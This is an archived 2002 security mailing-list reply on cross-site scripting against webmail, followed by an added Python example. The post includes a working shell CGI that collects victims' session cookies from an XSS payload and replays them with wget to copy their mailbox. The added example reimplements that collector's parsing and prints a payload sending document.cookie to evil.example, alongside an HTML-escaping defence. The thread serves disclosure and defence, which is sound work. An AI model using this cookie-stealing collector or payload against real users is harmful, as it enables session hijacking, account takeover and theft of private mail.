Vulnerability Development mailing list archives

Re: Evolution of Cross-Site Scripting Attacks


From: FozZy <fozzy () dmpfrance com>
Date: Mon, 20 May 2002 21:50:06 +0200

Great! This article is a very good explanation of how to set up an attack against web apps by using XSS.

However, it is not really a "prediction" of a new type of attack: several people (including me ;) have pointed out in 
the past on this mailing list that attacks against webmail can be easily automated by a script.  Here is a very lame 
shell CGI I used for a pen test against a Hotmail account:

$ cat /var/www/cgi-bin/recupmail.cgi
#!/bin/sh
# Minimal CGI that receives a victim's webmail URL and cookies from an XSS
# payload and mirrors the mailbox with wget. QUERY_STRING is expected as
#   <url>*<urlencoded cookies>
echo Content-type: text/plain
echo

set -f                               # no globbing on the untrusted query string
URL=`echo "$QUERY_STRING" | cut -d '*' -f 1 | cut -d '&' -f -2`                  # webmail URL, first two parameters only
URL_MESSAGE=`echo "$QUERY_STRING" | cut -d '*' -f 1`                             # full URL of the page the victim had open
COOKIES=`echo "$QUERY_STRING" | cut -d '*' -f 2 | /usr/local/sbin/urldecode.sh`  # decoded value for the Cookie: header
echo URL = $URL
echo COOKIES = $COOKIES
cd /home/fozzy/tmp/hotmail || exit 1
# Replay the stolen cookies while spoofing the victim's browser, and fetch the
# page plus everything it links to (-r -l 1), flattened into one directory (-nd).
UA='Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; BVRP Software)'
nohup wget -b --user-agent="$UA" -r -l 1 -o /tmp/recupmail.log --header="Cookie: $COOKIES" -nd "$URL" &
nohup wget -b --user-agent="$UA" -r -l 1 -o /tmp/recupmail.log --header="Cookie: $COOKIES" -nd "$URL_MESSAGE" &


I also used PHP scripts to prove that I could break into my accounts on many French webmail services 7 months ago. Everything 
was published in a French newspaper (Hackerz Voice) but I did not put it on the web because I fear script kiddies, and 
the code is not really interesting (it is quite straightforward).
If I was able to do that, surely many other people did the same thing. So, I am sure it has been exploited "in the wild" 
for a long time. :(

BTW, two weeks ago, Hotmail and Yahoo were still vulnerable to XSS...

FozZy

Hackademy / Hackerz Voice
http://www.dmpfrance.com
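As an added example (not FozZy's code and not part of the original post), the following Python reproduces the collector-side parsing that recupmail.cgi does with cut and urldecode, shows the headers the wget replay sends, and adds the defensive counterpart a webmail needs: HTML-encoding message content so an injected script never reaches the victim's browser. The hostnames webmail.example and evil.example, the cookie names sid and user, and the function names are constructed for this example.

```python
"""Added example (not from the post): the '<url>*<cookies>' collector protocol
of recupmail.cgi in Python, plus the output-encoding step that stops the XSS.
All names, URLs and cookie values here are constructed for the example."""
import html
from urllib.parse import unquote

# Browser string the posted script spoofs so the mailbox fetch looks like
# the victim's own IE 5.5 session.
SPOOFED_UA = "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; BVRP Software)"


def parse_harvester_query(query_string):
    """Split a '<url>*<urlencoded cookies>' QUERY_STRING the way the posted
    CGI does: cut -d '*' -f 1 for the URL, cut -d '&' -f -2 to keep at most
    the first two &-separated parameters, and urldecode on the cookie field."""
    url_part, sep, cookie_part = query_string.partition("*")
    if not sep:
        raise ValueError("expected '<url>*<cookies>' in QUERY_STRING")
    # cut -d '*' -f 2 keeps only the second '*'-field; mirror that exactly.
    cookie_field = cookie_part.split("*")[0]
    return {
        "url": "&".join(url_part.split("&")[:2]),  # trimmed URL (first two parameters)
        "url_message": url_part,                    # full URL of the page the victim had open
        "cookies": unquote(cookie_field),           # value for the replayed Cookie: header
    }


def replay_headers(parsed):
    """Headers the posted wget command sends when replaying the stolen session."""
    return {"User-Agent": SPOOFED_UA, "Cookie": parsed["cookies"]}


def render_message_body(untrusted_fragment):
    """Defensive counterpart: HTML-encode user-supplied message content before
    embedding it in the webmail page. An injected <script> that tries to read
    document.cookie then renders as inert text instead of executing."""
    return html.escape(untrusted_fragment, quote=True)


if __name__ == "__main__":
    # Constructed QUERY_STRING as an XSS payload would send it to the collector.
    qs = ("http://webmail.example/inbox?folder=1&page=2&msg=17"
          "*sid%3Dabc123%3B%20user%3Dalice")
    parsed = parse_harvester_query(qs)
    print(parsed["url"])
    print(parsed["url_message"])
    print(replay_headers(parsed)["Cookie"])
    print(render_message_body(
        '<script>location="http://evil.example/c?"+document.cookie</script>'))
```

Note that the collector's `cut -d '&' -f -2` silently drops everything after the second URL parameter, which is why the posted script fetches both the trimmed URL and the full one.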

